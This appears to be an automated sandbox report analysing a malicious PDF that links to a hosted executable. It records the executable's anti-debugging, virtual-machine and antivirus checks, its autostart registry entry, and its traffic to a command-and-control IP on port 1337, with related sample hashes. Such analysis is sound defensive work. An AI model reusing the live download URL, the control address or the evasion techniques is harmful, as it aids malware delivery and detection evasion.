Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeCode function: 5_2_3C11B6675_2_3C11B667
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeCode function: 5_2_3C1102C65_2_3C1102C6
Clickable URLs found in PDF pointing to bad filesShow sources
Source: aaa.pdfInitial sample: http://zwangerschapsyogaamsterdamwest.nl/wp-user/doc.exe

HIPS / PFW / Operating System Protection Evasion:

barindex
May try to detect the Windows Explorer process (often used for injection)Show sources
Source: AcroRd32.exeBinary or memory string: ProgmanH
Source: AcroRd32.exeBinary or memory string: Shell_TrayWndQ
Source: AcroRd32.exeBinary or memory string: Progman
Source: AcroRd32.exeBinary or memory string: Program ManagerK
Source: AcroRd32.exeBinary or memory string: Shell_TrayWnd

Anti Debugging:

barindex
Creates guard pages, often used to prevent reverse engineering and debuggingShow sources
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeMemory allocated: page read and write and page guard
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))Show sources
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeSystem information queried: KernelDebuggerInformation
Enables debug privilegesShow sources
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeProcess token adjusted: Debug
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeProcess token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exeProcess token adjusted: Debug

Malware Analysis System Evasion:

barindex
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)Show sources
Source: AcroRd32.exeBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllrShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\LocL
Source: iexplore.exeBinary or memory string: Hyper-V RAW
Queries a list of all running processesShow sources
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeProcess information queried: ProcessInformation
Contains long sleeps (>= 3 min)Show sources
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exeThread delayed: delay time: 922337203685477
Enumerates the file systemShow sources
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeFile opened: C:\Users\user\AppData\
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeFile opened: C:\Users\user\
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)Show sources
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)Show sources
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Uses ping.exe to sleepShow sources
Source: unknownProcess created: C:\Windows\System32\PING.EXE ping 1.1.1.1 -n 1 -w 1000
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 1.1.1.1 -n 1 -w 1000

Hooking and other Techniques for Hiding and Protection:

barindex
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exeProcess information set: NOOPENFILEERRORBOX

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)Show sources
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntiVirusProduct
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter : SELECT * FROM FirewallProduct

Language, Device and Operating System Detection:

barindex
Queries the cryptographic machine GUIDShow sources
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Queries the volume information (name, serial number etc) of a deviceShow sources
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 491829 Sample: aaa.pdf Startdate: 03/02/2018 Architecture: WINDOWS Score: 88 53 zwangerschapsyogaamsterdamwest.nl 2->53 63 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->63 65 Clickable URLs found in PDF pointing to bad files 2->65 67 Antivirus detection for submitted file 2->67 69 4 other signatures 2->69 10 AcroRd32.exe 16 38 2->10         started        signatures3 process4 process5 12 iexplore.exe 95 10->12         started        16 RdrCEF.exe 10->16         started        18 AcroRd32.exe 1 11 10->18         started        dnsIp6 49 C:\Users\user\...\doc.exe:Zone.Identifier, empty 12->49 dropped 51 doc.exe.t4d5zp4.partial:Zone.Identifier, empty 12->51 dropped 79 Browser exploit detected (process start blacklist hit) 12->79 21 doc.exe 12->21         started        25 iexplore.exe 12->25         started        28 RdrCEF.exe 16->28         started        30 RdrCEF.exe 16->30         started        55 8.8.8.8, 50993, 53, 54798 GOOGLE-GoogleIncUS United States 18->55 file7 signatures8 process9 dnsIp10 45 C:\Users\user\AppData\Local\Temp\...\doc.exe, empty 21->45 dropped 71 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 21->71 32 doc.exe 21->32         started        37 cmd.exe 21->37         started        61 zwangerschapsyogaamsterdamwest.nl 192.185.103.35, 49751, 49752, 80 CYRUSONE-CyrusOneLLCUS United States 25->61 47 C:\Users\user\...\doc.exe.t4d5zp4.partial, empty 25->47 dropped file11 signatures12 process13 dnsIp14 57 213.183.58.7, 1337, 49756, 49757 MELBICOM-EU-ASNL Lithuania 32->57 43 unknown, empty 32->43 dropped 73 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 32->73 59 1.1.1.1 unknown Australia 37->59 75 Uses ping.exe to sleep 37->75 39 conhost.exe 37->39         started        41 PING.EXE 37->41         started        file15 77 Detected TCP or UDP traffic on non-standard ports 57->77 signatures16 process17

Simulations

Behavior and APIs

TimeTypeDescription
21:33:32AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run flurant C:\Users\user\AppData\Roaming\\williams.exe

Antivirus Detection

Initial Sample

SourceDetectionCloudLink
aaa.pdf8%virustotalBrowse

Dropped Files

No Antivirus matches

Domains

SourceDetectionCloudLink
zwangerschapsyogaamsterdamwest.nl0%virustotalBrowse

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Joe Sandbox View / Context

IPs

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
192.185.103.35http://smarthome.quangcaosangtao.vn/point2/integrate/maliciousBrowse
  • solarhydro.net/mainauth/vrfy24/
1.1.1.147PO# MJB2017062409.exe821842ebead4c0c8038e1a25e1adcba707b02eb1ce124a80d02059dbb3232877maliciousBrowse
  • newbox2017-001-site1.itempurl.com/config.jpg
61PO# MJB2017062409.exe821842ebead4c0c8038e1a25e1adcba707b02eb1ce124a80d02059dbb3232877maliciousBrowse
  • newbox2017-001-site1.itempurl.com/config.jpg
47PO# MJB2017062409.exe821842ebead4c0c8038e1a25e1adcba707b02eb1ce124a80d02059dbb3232877maliciousBrowse
  • newbox2017-001-site1.itempurl.com/config.jpg
61PO# MJB2017062409.exe821842ebead4c0c8038e1a25e1adcba707b02eb1ce124a80d02059dbb3232877maliciousBrowse
  • newbox2017-001-site1.itempurl.com/config.jpg
213.183.58.761INQUIRY.jar695245f254bd298bb704b3e3ebb1a3f5988949f49b5969c89756f06f7dab098dmaliciousBrowse

    Domains

    No context

    ASN

    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
    MELBICOM-EU-ASNL37SHIPMENT DETAILS.jarbb6d04bf67c9a5875adbbf560b1a3a69b5b34f9f7d691a3453979a9eccfe993bmaliciousBrowse
    • 213.183.58.28
    144inv#989898.jar4ac257d04eacfef1108f8dbf194a7a885964a192a3693186de08c6f4c48e3c11maliciousBrowse
    • 213.183.58.36
    161order.jar63ef1d7b30fd9bbb08533075a7a0119c2303abf31caee79c7e314f0234d77dccmaliciousBrowse
    • 213.183.58.36
    19ORDER LIST 00235313 PDF.execc73f1cd593458d227626d618ba6da103ed7523ccd885d9b63c185db827a3369maliciousBrowse
    • 213.183.58.59
    new.exebdb1678187ff11a1586ac493e32e4fbc288fc1e1f0b9dd680764a9a3e38e98e2maliciousBrowse
    • 213.183.58.27
    11sadween trading RFQ .pdf.jar35b6d11a6ef04fc4fdbc5db67d42e48b4d0f6983e6f4856e4c91b7ab6ae472a7maliciousBrowse
    • 213.183.58.16
    27IMG_1009212017-001.jpg.jar2c3576d23cb18220ea1d1d069400a119afd03fb035e560dce9aae4f925271e57maliciousBrowse
    • 213.183.58.4
    83PO1#77322018.exebadc5ef1e511e8143b08828b707a4f41be7592a9a9486a66dc495547832baec3maliciousBrowse
    • 213.183.58.5
    88BANK SWIFT COPY.jar7505654ebe7904bb9a2994c5e51cd125a84a1b52e85aed878496c90065e9b6b3maliciousBrowse
    • 213.183.58.8
    25New Order.exea0eda639e5288af3c2df8ed5ec40489817819d50d6b8a10a7d584541b44e6f5cmaliciousBrowse
    • 213.183.58.34
    177PO-18672.jaref44cfb8939a8a4ab36ca78f05ee167da82ab693cf2df783e72fbafe2ba9d0b1maliciousBrowse
    • 213.183.58.17
    80PO.jar08cf471754214433e80a34f381a60b6eec9f1ade0accaaea9a1146125899f12dmaliciousBrowse
    • 213.183.58.28
    44PO112.jarf708877f46c0cbdf9c855eb7392a1b0a8edc205651ab25b50f740e7e062deb2cmaliciousBrowse
    • 213.183.40.31
    11cccc.exe5a5816c5bd453414112757f274704798f2b9b079cda808316099c3e6837eddc0maliciousBrowse
    • 213.183.40.10
    47ORDER LIST 0018930026.exec9494677ea837038c7eb74b00aed8ac15dbb6f4f16bcd095535e39785c1db739maliciousBrowse
    • 213.183.58.59
    SystemAudioClient.exe12e0148905c871df0e8bfbf998127fbf8899c437ddfede2ba1acf790263a7ed5maliciousBrowse
    • 213.183.58.30
    71FYI.exe3c9f33c7e16ca9aa611dfe8447b2eb34afd1d37d295c8887edcd7b20f06120e4maliciousBrowse
    • 213.183.58.34
    71FYI.exe3c9f33c7e16ca9aa611dfe8447b2eb34afd1d37d295c8887edcd7b20f06120e4maliciousBrowse
    • 213.183.58.34
    27Account Ledger Documents.jarf8602420b353d1e403ddcc92e225b7b08c1c839836729aa8c2a5b42d46e2feb6maliciousBrowse
    • 213.183.58.43
    81Order List.pdf.exee5039a02a3a54225075e261df8ab26a9d32adf798305c47cd1bd9d9e19d72276maliciousBrowse
    • 213.183.58.34
    CYRUSONE-CyrusOneLLCUS53Payment Details.jar04638f518a10edf46aa0bf2773d2035ae33653c74887bf242d9d97b96d68a653maliciousBrowse
    • 192.185.120.165
    Y8rSNN0U1.docx6ee04f0ff1fcf7b18446945c60a77d5ad953c4102b5099cd0aa24a2cceef10d9maliciousBrowse
    • 192.185.21.159
    59SLIP SABIC IBTC Transfer - MARUTI SUZUKI.exe85478e4902eaaf36709a819677ccf50f1e2624ac7404331ffab2aab74f60e9ecmaliciousBrowse
    • 108.179.213.67
    46Payment - ProLab PO PLSPO-user17001 - Tally upgrade.exe6b658ec75785c3ee84a698fc984caf69580fac2b0c228119c2b79c769f8336afmaliciousBrowse
    • 108.179.213.67
    Invoice #189938677510.doc67c3c3a72115570e6f6a609dbf6f115aa2031fa1ef540742e3ece81776cbe72amaliciousBrowse
    • 108.179.236.204
    Invoice #189938677510.doc67c3c3a72115570e6f6a609dbf6f115aa2031fa1ef540742e3ece81776cbe72amaliciousBrowse
    • 108.179.236.204
    Rechnungs-Details # 828256704534.doc7a713785ef3669c72a5c1cff9368af89bb816483caaaf0e02171f08ae6b256edmaliciousBrowse
    • 162.144.254.125
    Invoice #32257232.doc9f53ec77d3d8da1ab1eb50b1fcf837bf06d53c52e2912ed1228975ff67649629maliciousBrowse
    • 162.144.254.166
    3ProLab PO PLSPO-user17001 - Tally upgrade.exe669dca0a8f7e6e3f101a4860077f79e74300206b7c99ef2e26f6ea3696df62a0maliciousBrowse
    • 108.179.213.67
    https://mupahs.edu.bd/DOCX/qoqdocmaliciousBrowse
    • 162.241.241.69
    http://thedreamconnector.com/i/office/365/office/index.htmlmaliciousBrowse
    • 192.185.121.43
    67New Spec. Order.exe782a3fab9b36bf28b9c4fc1cc35c1117d0befe85532742d881dfc43d49a4b3fcmaliciousBrowse
    • 192.185.0.218
    http://sociallence.com/wp-content/uploads/asgarosforum/index_test.php/ahsq/?2hpen8pqg473pbp/maliciousBrowse
    • 192.185.6.144
    68invoice with bank details.exea6fa68ed565eb42126949838f1736203ea2eac5457b57acd1acfbcf7ec957c19maliciousBrowse
    • 216.172.164.149
    logonsystem.exef719e28bfc39196bee3117b0fbde76f8c88b623747f2d4f349fe0a7043635998maliciousBrowse
    • 162.144.254.166
    http://pbxsky.net/wwmaliciousBrowse
    • 192.185.140.236
    Invoice Number 778114.doc9ce27e2c4198d72d91d53eb790f6be33c91ffefb925dafce4f41a6f64fd9c4d1maliciousBrowse
    • 108.167.181.81
    http://pbxsky.net/wwmaliciousBrowse
    • 192.185.140.236
    77VLMDUET.exeDPKAA.exe9af9b9b374d6a205c026a164c0fbee3b9d91400ec72f1cabb71bfc4ef369fd0emaliciousBrowse
    • 96.125.173.15
    40MAWB-72977085610-1.exef97bdc3559767a33e5fd29d159f026bf6976398c1ce9dd61ca4b3b32be9e3459maliciousBrowse
    • 192.185.29.202
